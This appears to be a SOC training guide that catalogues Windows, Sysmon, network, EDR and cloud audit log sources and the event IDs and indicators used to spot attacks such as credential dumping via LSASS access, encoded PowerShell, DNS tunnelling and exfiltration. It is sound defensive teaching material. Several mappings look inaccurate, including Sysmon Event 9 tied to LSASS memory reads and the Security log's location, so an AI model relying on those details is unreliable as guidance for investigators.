Fundamentals

T1654

Log Sources Overview

A comprehensive guide to the log sources every SOC needs --- Windows Event Logs, Sysmon, firewall logs, DNS, proxy, EDR, cloud audit logs --- and what each reveals during investigations.

View on Graph

Why Logs Are the Foundation and What to Collect

Alerts are signals — they tell you something happened. Logs tell you what exactly, when, where, and how. Without logs, an alert is just noise. Every SOC investigation starts and ends in the logs.

The cardinal rule: log everything, filter later. It is far cheaper to store logs you don’t need than to discover you didn’t log something you do.

Below is a source-by-source breakdown of what each log type captures, the key fields and Event IDs to know, and how analysts use each source.

Windows Security Event Log

The most important single log source for Windows environments. Captures authentication, privilege use, process creation, and policy changes.

Key Event IDs

Event IDNameWhat It Means
4624An account was successfully logged onSuccessful authentication. Every login generates this — expected for normal activity, critical for tracking lateral movement.
4625An account failed to log onFailed authentication. High volume = brute force or password spray. Track by LogonType to distinguish network vs. interactive.
4634An account was logged offSession termination. Normal. Useful for session duration analysis.
4648A logon was attempted using explicit credentialsRunAs or service account impersonation. Critical for detecting pass-the-hash, scheduled task abuse, and lateral movement via WMI/PsExec.
4672Special privileges assigned to new logonAdmin-level login (requires SeTcbPrivilege or SeDebugPrivilege). Every admin login generates this — but so does SYSTEM account activity.
4688A new process has been createdProcess creation. The most important security event for endpoint detection. Captures CommandLine, ParentProcessName, ProcessId. Essential for detecting powershell.exe -EncodedCommand, rundll32.exe abuse, wscript.exe/cscript.exe execution.
4698A scheduled task was createdScheduled task creation. Malware persists via tasks (T1053.005).
4700A scheduled task was enabledTask activation. Check this alongside 4698 to confirm the task ran.
4719System audit policy was changedAttacker covering tracks or disabling logging (T1562.002). This should be rare — any instance is high-priority.
4720A user account was createdNew user creation. Attackers creating backdoor accounts (T1136.001). Compare with HR onboarding records.
4728A member was added to a security-enabled global groupHigh-value group membership change. Domain Admin group additions are critical (T1098).
4732A member was added to a security-enabled local groupLocal admin group additions.
4740A user account was locked outAccount lockout. Could indicate brute force or user error. Check surrounding 4625 events.
4768A Kerberos authentication ticket was requestedTGT request. Volume spikes may indicate Kerberoasting (T1558.003).
4769A Kerberos service ticket was requestedST request. Multiple 4769 for the same service account from different source IPs = Kerberoasting.
4776The domain controller attempted to validate credentialsNTLM authentication. Critical for pass-the-hash detection (T1550.002).
4778A session was reconnected to a Window StationRDP session reconnect. Useful for RDP session tracking (T1021.001).
4779A session was disconnected from a Window StationRDP disconnect.
5136A directory service object was modifiedAD object modification. Tracks changes to user/group attributes.
5140A network share object was accessedSMB share access. Useful for tracking data access patterns.
5145A network share object was checked to see whether client can be granted desired accessShare enumeration. May indicate lateral movement staging (T1021.002).
5156The Windows Filtering Platform has permitted a connectionNetwork connection allowed. Useful for outbound connection monitoring.
5157The Windows Filtering Platform has blocked a connectionNetwork connection blocked. Tracks blocked-outbound by Windows Firewall.
5379Credential Manager credentials were readCredential dumping indicator. Tracks when tools like mimikatz or Invoke-Mimikatz read stored credentials (T1003.001).

Where to find it: Applications and Services Logs > Microsoft > Windows > Security (or forwarded to Windows Event Forwarding collector)

Analyst note: Enable CommandLine logging in 4688 events via GPO (Administrative Templates > System > Audit Process Creation > Include command line in process creation events). This is not enabled by default — and it is the single highest-value log setting you can enable.

Sysmon

Microsoft Sysinternals’ Sysmon sits on Windows endpoints and provides granular telemetry that the built-in security log does not capture. It is the de facto standard for endpoint visibility.

Key Event IDs

Event IDNameWhat It Means
1Process creationLike 4688 but with more fields: Hashes, Image, CommandLine, ParentImage, User. Includes SHA1/SHA256/MD5 hash of the executable — enables immediate file reputation check.
2A process changed a file creation timeTimestomping detection (T1070.006). Attackers modify timestamps to blend in with legitimate files. Sysmon catches the original UTC time.
3Network connectionOutbound network connections from processes. Critical for detection. Tracks SourceIp, DestinationIp, DestinationPort, Protocol, Image (which process made the connection). Essential for detecting beaconing, data exfiltration, lateral movement.
4Sysmon service state changedSysmon started or stopped. Stopped = attacker disabling endpoint visibility. Immediate escalation.
5Process terminatedProcess exit. Useful for process lifetime analysis.
6Driver loadedKernel driver loading. Malicious or vulnerable drivers circumvent user-mode protections.
7Image loadedDLL loaded into a process. Critical for detecting DLL sideloading, process hollowing, and reflective DLL injection (T1055.001, T1574.002).
8CreateRemoteThreadProcess injection detected. A process creating a thread in another process’s memory space is a strong lateral movement indicator (T1055).
9RawAccessReadDirect disk read. Mimikatz and other credential dumping tools read LSASS process memory directly (T1003.001).
10Process accessedOne process opening a handle to another (OpenProcess). LSASS process access from non-LSASS process = credential dumping indicator.
11FileCreateFile creation. Useful for tracking malware drops, especially in suspicious directories (Users/*/AppData, Windows/Temp).
12RegistryEvent (Object create/delete)Registry key creation/deletion. Persistence mechanism detection (T1547).
13RegistryEvent (Value set)Registry value modification. Common persistence technique.
14RegistryEvent (Key and value rename)Registry renaming. Rare — usually indicates sophisticated evasion.
15FileCreateStreamHashAlternate Data Stream (ADS) creation. Attackers hide executables in ADS on NTFS (T1564.004).
16Sysmon configuration changeSysmon config updated. Compare against approved configuration baseline.
17Pipe createdNamed pipe creation. PsExec and other lateral movement tools create named pipes (T1572).
18Pipe connectedNamed pipe connection. Tracks which process connects to which pipe.
19WmiEventFilterWMI persistence filter creation. WMI event subscription persistence (T1546.003).
20WmiEventConsumerWMI event consumer creation. WMI event subscription persistence.
21WmiEventConsumerToFilterWMI filter-to-consumer binding. WMI event subscription binding (the actual trigger).
22DNSEventDNS query. DNS query logging per-process. Tracks QueryName, QueryStatus, QueryResults, ProcessGuid. Essential for DNS tunneling detection and C2 beacon identification.

Where to find it: Applications and Services Logs > Microsoft > Windows > Sysmon/Operational

Analyst note: Sysmon Event ID 3 (network connections) and Event ID 22 (DNS queries) are the most valuable for network-based threat detection. Ensure your Sysmon config enables both. The default SwiftOnSecurity configuration is an excellent starting point.

Firewall Logs

Firewall logs record allowed and blocked network connections at the network perimeter and between network segments.

What They Capture

  • Source IP/Port and Destination IP/Port
  • Protocol (TCP, UDP, ICMP)
  • Action (Allow, Deny, Drop, Reset)
  • Timestamp and Interface
  • Packet size and TCP flags (on some platforms)

Analyst Use Cases

  • Outbound connection monitoring: Allowed outbound connections to unknown IPs. Cross-reference with threat intelligence feeds.
  • Blocked traffic analysis: Dropped inbound connections are normal (internet noise), but blocked outbound traffic from an internal host to an external IP means a policy violation or compromised host attempting C2.
  • Port scan detection: High volume of denied connections from a single source IP targeting multiple ports = scanning activity (T1046).
  • Data exfiltration: Unusually large outbound packets or persistent outbound connections to a single external IP at regular intervals.

Cloud Firewall Examples

AWS Security Group logs (VPC Flow Logs):

  • srcaddr, dstaddr, dstport, protocol, action (ACCEPT/REJECT), bytes, packets, start, end
  • Query: action = REJECT and dstport not in (443, 80, 53) = unusual blocked traffic

Azure NSG Flow Logs:

  • FlowDirection (I=inbound, O=outbound), FlowStatus (A=allowed, D=denied), SourcePort, DestinationPort
  • Query: FlowStatus = D and FlowDirection = O = outbound traffic blocked

GCP VPC Flow Logs:

  • Similar structure. dest_port, src_ip, dest_ip, bytes_sent, packets

DNS Query Logs

DNS logs are the most underappreciated detection source in most SOCs. Every connection starts with a DNS query. If you can capture all DNS queries from all endpoints, you have a baseline of every domain being accessed.

What They Capture

  • Client IP — who asked
  • Query name — what domain
  • Query type — A, AAAA, CNAME, MX, TXT, ANY
  • Response IP — what the domain resolved to
  • Response code — NXDOMAIN, NOERROR, SERVFAIL
  • Timestamp

Analyst Use Cases

  • DGAs (Domain Generation Algorithms): Random-looking subdomain or domain names (e.g., a7x9p2z.malware-domain.info). High query-to-NXDOMAIN ratio indicates DGA-based C2 (T1568.002).
  • DNS tunneling: High volume of TXT or CNAME queries with subdomains > 30 characters. Especially suspicious when it comes from a single host (T1572).
  • Newly observed domains (NODs): Domains registered < 30 days ago that appear in your DNS logs. A leading indicator of phishing sites and C2 infrastructure.
  • Beaconing: Regular query intervals (every 60 minutes on the dot to the same domain). Time-between-queries (TBQ) analysis works well on DNS logs.
  • Fast flux: Rapidly changing A records for a single domain — the domain resolves to different IPs in rapid succession, indicating fast-flux botnet infrastructure.

Example Indicators

IndicatorWhat to Look For
High TXT query volumeDNS tunneling for C2 or exfiltration
Long subdomain (> 30 chars)Data encoding in DNS queries
High NXDOMAIN rate (> 50%)DGAs or malware checking for C2 domains that don’t exist yet
Consistent query intervals (every 60 min ± 5 min)C2 beaconing
Query to domain registered < 30 daysSuspicious domain — needs investigation

Proxy/Web Filter Logs

Web proxy logs record all HTTP/HTTPS traffic passing through the organization’s proxy. They provide visibility into web-based attacks, policy violations, and C2 traffic.

What They Capture

  • Source IP and username (if authenticated proxy)
  • URL (full URL for HTTP, hostname for HTTPS)
  • User-Agent string
  • HTTP method and status code
  • Content type and bytes transferred
  • Block/Action (allowed, blocked, warned)

Analyst Use Cases

  • C2 traffic: Beacons to known C2 infrastructure. Regular intervals, consistent payload sizes, unusual User-Agents.
  • Phishing URL visits: Users clicking links in phishing emails. The proxy log confirms the user visited the site.
  • Data exfiltration: Large POST requests to external domains (especially cloud storage/file sharing).
  • Policy violations: Tor traffic, anonymizer sites, unauthorized cloud services (shadow IT).
  • User-Agent anomalies: Empty User-Agent, non-browser User-Agent, or User-Agent matching an outdated browser version = automation tooling or malware.

EDR Telemetry

Endpoint Detection and Response (EDR) logs combine traditional event logging, Sysmon-like telemetry, behavioral analytics, and network visibility into a single platform.

What They Capture

  • Process tree — every process, parent process, child process, command line
  • File operations — create, modify, delete, rename with full paths
  • Registry operations — key create, modify, delete
  • Network connections — per-process outbound connections with full IP/port detail
  • Memory access — process handle operations, injection detection
  • Script execution — PowerShell script block logging, VBS macro detection
  • User behavior — logins, privilege changes, authentication patterns

Analyst Use Cases

  • Process ancestry analysis: winword.exe → cmd.exe → powershell.exe = potential macro-based malware (a “living off the land” chain — T1204.002).
  • Remote thread creation: explorer.exe creating a remote thread in svchost.exe = process injection.
  • LSASS access alerts: EDR alerting on any process opening a handle to LSASS.
  • Beaconing detection: Network connections at regular intervals with consistent payload sizes over a sustained period.
  • Fileless malware detection: PowerShell running encoded commands without a parent that justifies scripting.

Cloud Audit Logs

AWS CloudTrail

Records all API calls made to AWS services.

Key events:

  • ConsoleLogin — AWS console login (geolocation, MFA status, access key vs. password)
  • CreateAccessKey — New access key creation. Could be attacker establishing persistence (T1098).
  • CreateUser / CreateRole — Unexpected IAM resource creation = persistence.
  • CreateInstance / RunInstances — New compute resource launched (cryptocurrency mining, C2 infrastructure).
  • ModifySecurityGroup / AuthorizeSecurityGroupIngress — Security group change opening ports.
  • PutBucketPolicy / GetBucketAcl — S3 access policy changes.
  • AssumeRole — Cross-account role assumption.
  • KMS* operations — Cryptographic operations. Suspicious if from a user who never uses KMS normally.

Azure Activity Log

Records control-plane operations on Azure resources.

Key events:

  • Microsoft.Network/networkSecurityGroups/securityRules/write — NSG rule modification
  • Microsoft.Compute/virtualMachines/extensions/write — VM extension installation (custom script extension = persistence)
  • Microsoft.Authorization/roleAssignments/write — RBAC role assignment change
  • Microsoft.ManagedIdentity/userAssignedIdentities/assign — Managed identity assignment for privilege escalation

GCP Cloud Audit Logs

  • google.iam.admin.v1.CreateServiceAccount or google.iam.admin.v1.CreateKey — Service account key creation outside of automation pipelines.
  • compute.instances.insert — Unexpected VM creation.
  • storage.buckets.setIamPolicy — Bucket permission changes.

Log Correlation — Putting It All Together

A single log source is rarely enough. The power comes from correlation:

ScenarioSources Needed
User clicked phishing linkProxy log (proves visit) + DNS log (domain lookup) + EDR (process creation, file download) + Email gateway (original message)
Lateral movementWindows Security 4624/4648 (logon from source) + Sysmon 3 (network connection) + Sysmon 1 (process creation on destination)
C2 beaconingDNS log (query to C2 domain) + Proxy log (HTTP beacon to same domain) + Sysmon 3 (network connection) + Firewall log (allowed outbound)
Ransomware executionEDR (process tree: script → downloader → encryptor) + File operations (mass file modifications + extension changes) + Scheduled task creation (persistence) + DNS (phishing domain visited)
Data exfiltrationDNS log (large TXT queries) + Proxy log (large POST requests) + Sysmon 3 (outbound connections) + Firewall log (allowed outbound to unusual port)

Sources